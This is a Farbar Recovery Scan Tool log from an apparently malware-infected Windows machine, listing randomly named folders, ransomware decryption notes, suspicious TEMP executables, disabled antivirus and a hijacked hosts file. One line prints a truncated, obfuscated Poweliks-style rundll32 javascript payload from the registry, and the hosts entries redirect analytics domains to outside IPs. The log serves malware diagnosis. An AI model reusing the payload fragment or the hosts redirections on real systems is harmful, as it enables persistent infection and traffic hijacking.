2015-02-20 06:07 - 2014-07-23 15:56 - 00098216 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2015-02-20 02:17 - 2014-10-14 10:30 - 00000000 ____D () C:\Windows.old
2015-02-19 23:30 - 2014-09-07 12:01 - 00000000 ____D () C:\Users\Public\CyberLink
2015-02-19 23:28 - 2014-11-14 15:44 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Adhoxi
2015-02-19 23:28 - 2014-07-23 15:49 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\unpacked23206
2015-02-19 23:28 - 2014-07-23 09:13 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Adobe
2015-02-19 23:28 - 2014-07-23 09:09 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard
2015-02-19 23:23 - 2014-11-10 16:42 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\Ovics
2015-02-19 23:21 - 2014-10-14 13:14 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\AMD
2015-02-19 23:21 - 2014-08-11 11:56 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\Apple Computer
2015-02-19 22:45 - 2014-11-26 18:24 - 00000000 ____D () C:\ProgramData\bamgaq
2015-02-19 22:11 - 2014-11-07 11:27 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\{30112b75-e574-a6db-560c-8103291a0838}
2015-02-19 21:07 - 2014-12-03 17:38 - 00000000 ____D () C:\ProgramData\PenulErhig
2015-02-19 07:40 - 2015-01-13 16:26 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Kuseyd
2015-02-19 07:40 - 2015-01-13 16:26 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Guhyanmo
2015-02-19 07:40 - 2015-01-06 13:58 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Veepme
2015-02-19 07:40 - 2015-01-05 20:36 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Kybeuv
2015-02-19 07:40 - 2015-01-05 15:02 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Wiudiz
2015-02-19 07:40 - 2015-01-02 12:19 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Tapyara
2015-02-19 07:40 - 2014-12-26 17:52 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Rifiewyn
2015-02-19 07:40 - 2014-12-25 17:44 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ynopqual
2015-02-19 07:40 - 2014-12-25 15:54 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ihywkead
2015-02-19 07:40 - 2014-12-25 15:43 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ekmiys
2015-02-19 07:40 - 2014-12-23 15:28 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Maypyz
2015-02-19 07:40 - 2014-12-22 15:27 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Fuwutee
2015-02-19 07:40 - 2014-12-22 14:56 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Fyarxy
2015-02-19 07:40 - 2014-12-21 15:20 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Zekubuab
2015-02-19 07:40 - 2014-12-15 16:15 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Wuwuec
2015-02-19 07:40 - 2014-12-14 15:11 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Byloaq
2015-02-19 07:40 - 2014-12-12 15:35 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Yhohybe
2015-02-19 07:40 - 2014-12-11 21:23 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Hovoote
2015-02-19 07:40 - 2014-12-11 16:09 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Amcyocut
2015-02-19 07:40 - 2014-12-11 09:47 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Itsefo
2015-02-19 07:40 - 2014-12-08 17:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Tumiexcu
2015-02-19 07:40 - 2014-12-08 16:37 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ziqeexew
2015-02-19 07:40 - 2014-12-04 15:16 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Mawywopo
2015-02-19 07:40 - 2014-12-03 17:42 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Icxeewhu
2015-02-19 07:40 - 2014-12-03 13:46 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ucucni
2015-02-19 07:40 - 2014-12-02 18:10 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Edutsoix
2015-02-19 07:40 - 2014-12-01 10:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ruyxku
2015-02-19 07:40 - 2014-12-01 10:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Huqokayx
2015-02-19 07:40 - 2014-12-01 10:42 - 00000000 ____D () C:\ProgramData\TifwIdyo
2015-02-19 07:40 - 2014-12-01 10:42 - 00000000 ____D () C:\ProgramData\BolsiWelug
2015-02-19 07:40 - 2014-11-28 08:56 - 00000000 ____D () C:\ProgramData\PeboZnoli
2015-02-19 07:40 - 2014-11-28 08:56 - 00000000 ____D () C:\ProgramData\CecuSefki
2015-02-19 07:40 - 2014-11-24 20:33 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Itufefv
2015-02-19 07:40 - 2014-11-24 20:28 - 00000000 ____D () C:\ProgramData\FapziGguzq
2015-02-19 07:40 - 2014-11-23 15:14 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Senyzayr
2015-02-19 07:40 - 2014-11-23 15:09 - 00000000 ____D () C:\ProgramData\QiktiWuffu
2015-02-19 07:40 - 2014-11-23 15:09 - 00000000 ____D () C:\ProgramData\FadyOdyu
2015-02-19 07:40 - 2014-11-23 08:58 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Zacosia
2015-02-19 07:40 - 2014-11-23 08:53 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ecqootfi
2015-02-19 07:40 - 2014-11-23 08:43 - 00000000 ____D () C:\ProgramData\TixoZuwu
2015-02-19 07:40 - 2014-11-20 15:57 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ymqiuky
2015-02-19 07:40 - 2014-11-20 15:57 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Qaedxa
2015-02-19 07:40 - 2014-11-20 15:54 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Hyipfy
2015-02-19 07:40 - 2014-11-20 15:49 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\FrameworkUpdate
2015-02-19 07:40 - 2014-11-20 15:49 - 00000000 ____D () C:\ProgramData\EiniHubex
2015-02-19 07:40 - 2014-11-19 16:07 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Woakduwa
2015-02-19 07:40 - 2014-11-19 16:07 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Obmukany
2015-02-19 07:40 - 2014-11-19 16:03 - 00000000 ____D () C:\ProgramData\GuxeXowi
2015-02-19 07:40 - 2014-11-18 15:30 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Gynika
2015-02-19 07:40 - 2014-11-18 15:30 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Egewtoi
2015-02-19 07:40 - 2014-11-18 15:26 - 00000000 ____D () C:\ProgramData\MokeVike
2015-02-19 07:40 - 2014-11-17 19:11 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Pevyliu
2015-02-19 07:40 - 2014-11-17 19:11 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ciokov
2015-02-19 07:40 - 2014-11-17 19:07 - 00000000 ____D () C:\ProgramData\MesmAyof
2015-02-19 07:40 - 2014-11-17 10:10 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ohvyev
2015-02-19 07:40 - 2014-11-17 10:10 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Esisgyl
2015-02-19 07:40 - 2014-11-17 10:05 - 00000000 ____D () C:\ProgramData\LuqePana
2015-02-19 07:40 - 2014-11-16 11:38 - 00000000 ____D () C:\ProgramData\YuctAren
2015-02-19 07:40 - 2014-11-16 11:38 - 00000000 ____D () C:\ProgramData\GiqyoCxuko
2015-02-19 07:40 - 2014-11-16 11:02 - 00000000 ____D () C:\ProgramData\JoheMsum
2015-02-19 07:40 - 2014-11-16 11:02 - 00000000 ____D () C:\ProgramData\JahebSuhvo
2015-02-19 07:40 - 2014-11-15 11:27 - 00000000 ____D () C:\ProgramData\HozbEzpud
2015-02-19 07:40 - 2014-11-15 11:27 - 00000000 ____D () C:\ProgramData\FasuTuhu
2015-02-19 07:40 - 2014-11-14 15:44 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ytbynede
2015-02-19 07:40 - 2014-11-14 15:40 - 00000000 ____D () C:\ProgramData\NeheQiri
2015-02-19 07:40 - 2014-11-14 15:40 - 00000000 ____D () C:\ProgramData\KaseJolmi
2015-02-19 07:40 - 2014-11-13 18:25 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ezrydu
2015-02-19 07:40 - 2014-11-13 18:21 - 00000000 ____D () C:\ProgramData\UardiNdeca
2015-02-19 07:40 - 2014-11-13 10:22 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Sequefb
2015-02-19 07:40 - 2014-11-13 10:22 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Onpyym
2015-02-19 07:40 - 2014-11-13 10:17 - 00000000 ____D () C:\ProgramData\UopiJowv
2015-02-19 07:40 - 2014-11-13 10:17 - 00000000 ____D () C:\ProgramData\DervUvon
2015-02-19 07:40 - 2014-11-12 17:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ezupuhaf
2015-02-19 07:40 - 2014-11-12 17:40 - 00000000 ____D () C:\ProgramData\PokuGehos
2015-02-19 07:40 - 2014-11-12 17:40 - 00000000 ____D () C:\ProgramData\NerxElyo
2015-02-19 07:40 - 2014-11-11 20:48 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Upvukyy
2015-02-19 07:40 - 2014-11-11 20:47 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Olaqduqo
2015-02-19 07:40 - 2014-11-11 20:42 - 00000000 ____D () C:\ProgramData\PapoSutul
2015-02-19 07:40 - 2014-11-11 20:42 - 00000000 ____D () C:\ProgramData\MoruYemq
2015-02-19 07:40 - 2014-11-11 18:14 - 00000000 ____D () C:\ProgramData\JufhEnusi
2015-02-19 07:40 - 2014-11-10 16:29 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\FrameworkUpdate7
2015-02-19 07:40 - 2014-11-10 16:29 - 00000000 ____D () C:\ProgramData\YansAjfir
2015-02-19 07:40 - 2014-11-10 16:29 - 00000000 ____D () C:\ProgramData\KitpUxijo
2015-02-19 07:40 - 2014-11-07 17:00 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\Ugmedia
2015-02-19 07:40 - 2014-11-07 16:59 - 00000000 ____D () C:\ProgramData\XiceNnar
2015-02-19 07:40 - 2014-11-07 16:59 - 00000000 ____D () C:\ProgramData\TobaFisa
2015-02-19 07:40 - 2014-10-02 15:49 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\tmp1461
2015-02-19 01:24 - 2014-10-14 10:31 - 00000000 ___DC () C:\WINDOWS\Panther
2015-02-19 01:18 - 2014-11-11 16:55 - 00000000 ____D () C:\WINDOWS\Minidump
2015-02-15 08:13 - 2013-08-22 07:25 - 00262144 ___SH () C:\WINDOWS\system32\config\ELAM
2015-02-01 20:32 - 2014-11-10 16:30 - 00000648 _____ () C:\ProgramData\@system.temp
2015-02-01 20:32 - 2014-11-10 16:30 - 00000384 ____H () C:\ProgramData\@system3.att
2015-02-01 15:57 - 2015-01-14 07:56 - 00020480 ___SH () C:\Users\Dorothy01\Desktop\Thumbs.db
 
==================== Files in the root of some directories =======
 
2014-11-13 18:51 - 2015-01-07 09:58 - 0000288 _____ () C:\Users\Dorothy01\AppData\Roaming\1B477081.reg
2014-11-21 18:59 - 2014-11-21 18:59 - 0022327 _____ () C:\Users\Dorothy01\AppData\Roaming\893686b8
2011-07-11 21:06 - 2011-07-11 21:06 - 0212304 _____ (Microsoft Corporation) C:\Users\Dorothy01\AppData\Roaming\BtvStack.dll
2015-01-05 14:15 - 2015-01-05 14:15 - 0015872 _____ () C:\Users\Dorothy01\AppData\Roaming\cowitches.d
2014-11-12 18:01 - 2014-11-12 18:01 - 0008542 _____ () C:\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-11-12 18:01 - 2014-11-12 18:01 - 0004214 _____ () C:\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2015-01-12 15:11 - 2015-01-12 15:11 - 0008562 _____ () C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.HTML
2015-01-12 15:11 - 2015-01-12 15:11 - 0001270 _____ () C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.PNG
2015-01-12 15:11 - 2015-01-12 15:11 - 0004224 _____ () C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.TXT
2014-11-13 18:51 - 2015-01-07 09:58 - 0009728 _____ () C:\Users\Dorothy01\AppData\Roaming\mcp.ico
2014-07-23 15:49 - 2014-07-23 15:49 - 0000043 _____ () C:\Users\Dorothy01\AppData\Roaming\WB.CFG
2014-11-10 16:30 - 2014-11-10 16:30 - 0000448 ____H () C:\Users\Dorothy01\AppData\Roaming\麽鎒駓覜
2014-11-21 18:59 - 2014-11-21 18:59 - 0037439 _____ () C:\Users\Dorothy01\AppData\Local\893686b8
2014-11-12 18:01 - 2014-11-12 18:01 - 0008542 _____ () C:\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-11-12 18:01 - 2014-11-12 18:01 - 0004214 _____ () C:\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-12-11 09:44 - 2014-12-11 21:24 - 0929536 _____ () C:\Users\Dorothy01\AppData\Local\f5e83w4ef.dat
2015-01-12 15:10 - 2015-01-12 15:10 - 0008562 _____ () C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.HTML
2015-01-12 15:10 - 2015-01-12 15:10 - 0001270 _____ () C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.PNG
2015-01-12 15:10 - 2015-01-12 15:10 - 0004224 _____ () C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.TXT
2015-02-19 21:07 - 2015-02-19 21:07 - 0023552 _____ () C:\Users\Dorothy01\AppData\Local\pckunie.dll
2015-02-21 03:30 - 2015-02-21 03:30 - 0023552 _____ () C:\Users\Dorothy01\AppData\Local\pgkunge.dll
2014-11-21 18:59 - 2014-11-21 18:59 - 0026477 _____ () C:\ProgramData\893686b8
2014-11-10 16:30 - 2015-02-01 20:32 - 0000648 _____ () C:\ProgramData\@system.temp
2014-11-10 16:30 - 2015-02-01 20:32 - 0000384 ____H () C:\ProgramData\@system3.att
2015-01-12 15:09 - 2015-01-12 15:09 - 0008562 _____ () C:\ProgramData\HELP_DECRYPT.HTML
2015-01-12 15:09 - 2015-01-12 15:09 - 0001270 _____ () C:\ProgramData\HELP_DECRYPT.PNG
2015-01-12 15:09 - 2015-01-12 15:09 - 0004224 _____ () C:\ProgramData\HELP_DECRYPT.TXT
2012-09-01 00:08 - 2012-09-01 00:08 - 0000141 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.351.64.bc
 
Files to move or delete:
====================
C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe
 
 
Some content of TEMP:
====================
C:\Users\Dorothy01\AppData\Local\Temp\ARS.exe
C:\Users\Dorothy01\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe
C:\Users\Dorothy01\AppData\Local\Temp\ivbhim.exe
C:\Users\Dorothy01\AppData\Local\Temp\jre-8u31-windows-au.exe
C:\Users\Dorothy01\AppData\Local\Temp\Quarantine.exe
C:\Users\Dorothy01\AppData\Local\Temp\sqlite3.dll
C:\Users\Dorothy01\AppData\Local\Temp\tmp7A9C.tmp.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-14 09:32
 
==================== End Of Log ============================
 
ADDITIONAL SCAN
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 21-02-2015
Ran by Dorothy01 at 2015-02-21 22:42:35
Running from C:\Users\Dorothy01\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Norton Internet Security (Disabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Internet Security (Disabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Internet Security (Disabled) {6BFC5632-188D-B806-D13E-C607121B42A0}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4 Elements II (x32 Version: 2.2.0.98 - WildTangent) Hidden
AMD Catalyst Install Manager (HKLM\...\{5F769CF4-5263-4C7B-AEB2-C06A73AE4428}) (Version: 8.0.881.0 - Advanced Micro Devices, Inc.)
Apple Application Support (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{6AF2AC2A-3532-43FD-9F4D-BDC9C0D724C7}) (Version: 7.1.2.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 10.0.2208 - AVAST Software)
Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Build-a-lot 4 - Power Source (x32 Version: 2.2.0.98 - WildTangent) Hidden
Catalyst Control Center (HKLM-x32\...\WUCCCApp) (Version: 1.00.0000 - AMD)
CCleaner (HKLM\...\CCleaner) (Version: 5.02 - Piriform)
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Cradle Of Egypt Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Cradle of Rome 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1.5510 - CyberLink Corp.)
CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.1.1916 - CyberLink Corp.)
CyberLink PhotoDirector (HKLM-x32\...\InstallShield_{4862344A-A39C-4897-ACD4-A1BED5163C5A}) (Version: 2.0.1.3109 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.1.1902 - CyberLink Corp.)
CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.1.1925 - CyberLink Corp.)
CyberLink PowerDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.1.4407 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.4.5527 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Energy Star (HKLM\...\{0FA995CC-C849-4755-B14B-5404CC75DC24}) (Version: 1.0.8 - Hewlett-Packard)
Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) Hidden
FATE: The Cursed King (x32 Version: 2.2.0.97 - WildTangent) Hidden
Final Drive Fury (x32 Version: 2.2.0.95 - WildTangent) Hidden
FlatOut 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 40.0.2214.115 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Update Helper (x32 Version: 1.3.21.169 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.26.9 - Google Inc.) Hidden
Governor of Poker 2 Premium Edition (x32 Version: 2.2.0.95 - WildTangent) Hidden
Hewlett-Packard ACLM.NET v1.2.0.0 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
Hoyle Card Games (x32 Version: 2.2.0.95 - WildTangent) Hidden
HP Connected Music (Meridian - installer) (HKLM-x32\...\StartHPConnectedMusic) (Version: v1.0 - Meridian Audio Ltd)
HP Connected Remote (HKLM-x32\...\{F243A34B-AB7F-4065-B770-B85B767C247C}) (Version: 1.0.1202 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.3.0 - WildTangent)
HP MyRoom (HKLM-x32\...\{9C35EDE5-4B0F-45E7-A438-314BA889948E}) (Version: 9.0.0.0 - Hewlett-Packard Company)
HP Registration Service (HKLM\...\{E4D6CCF2-0AAF-4B9C-9DE5-893EDC9B4BAA}) (Version: 1.0.5976.4186 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{FF27F674-821E-4BA2-985B-DDF539C2CD03}) (Version: 7.0.33.6 - Hewlett-Packard Company)
HP Support Information (HKLM-x32\...\{B2B7B1C8-7C8B-476C-BE2C-049731C55992}) (Version: 12.00.0000 - Hewlett-Packard)
iscsicli (HKLM\...\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb) (Version:  - )
iTunes (HKLM\...\{77DE5105-D05E-448C-96CB-7FA381903753}) (Version: 11.3.1.2 - Apple Inc.)
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden
Luxor Evolved (x32 Version: 2.2.0.98 - WildTangent) Hidden
Mahjongg Dimensions Deluxe: Tiles in Time (x32 Version: 2.2.0.98 - WildTangent) Hidden
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Mortimer Beckett and the Crimson Thief Premium Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Mystery P.I. - Curious Case of Counterfeit Cove (x32 Version: 2.2.0.98 - WildTangent) Hidden
Norton Internet Security (HKLM-x32\...\NIS) (Version: 20.6.0.27 - Symantec Corporation)
Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden
Ralink RT5390R 802.11bgn Wi-Fi Adapter (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 5.0.0.0 - Ralink)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6675 - Realtek Semiconductor Corp.)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.2.8400.28123 - Realtek Semiconductor Corp.)
Recovery Manager (x32 Version: 5.5.0.5530 - CyberLink Corp.) Hidden
Roads of Rome 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
StarmIRC 3.0 (HKLM-x32\...\StarmIRC 3.0) (Version:  - )
StarPircH v3.0 (HKLM-x32\...\StarPircH v3.0) (Version:  - )
Tales of Lagoona (x32 Version: 2.2.0.110 - WildTangent) Hidden
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
Vacation Quest™ - Australia (x32 Version: 2.2.0.98 - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent)
WildTangent Games App (x32 Version: 4.0.9.6 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
ZTE Handset USB Driver (HKLM\...\{01D42BF0-ED08-463f-8A28-99EB6FEE962B}) (Version:  - ZTE Corporation)
ZTE Handset USB Driver (HKLM\...\{D2D77DC2-8299-11D1-8949-444553540000}_is1) (Version: 5.2104.1.01B01 - ZTE Corporation)
Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-1427692388-1042374531-2795145444-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
 
==================== Restore Points  =========================
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 07:25 - 2015-02-21 03:31 - 00001509 _RASH C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1       localhost
195.162.68.59 www.google-analytics.com.
195.162.68.59 google-analytics.com.
195.162.68.59 connect.facebook.net.
162.247.13.54 www.google-analytics.com.
162.247.13.54 google-analytics.com.
162.247.13.54 connect.facebook.net.
195.162.69.252 www.google-analytics.com.
195.162.69.252 google-analytics.com.
195.162.69.252 connect.facebook.net.
 
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0AF68A16-8BB9-4884-9B4E-15D4F360BB7B} - System32\Tasks\Security Center Update - 2036164130 => C:\Users\Dorothy01\AppData\Roaming\Yhohybe\odhie.exe <==== ATTENTION
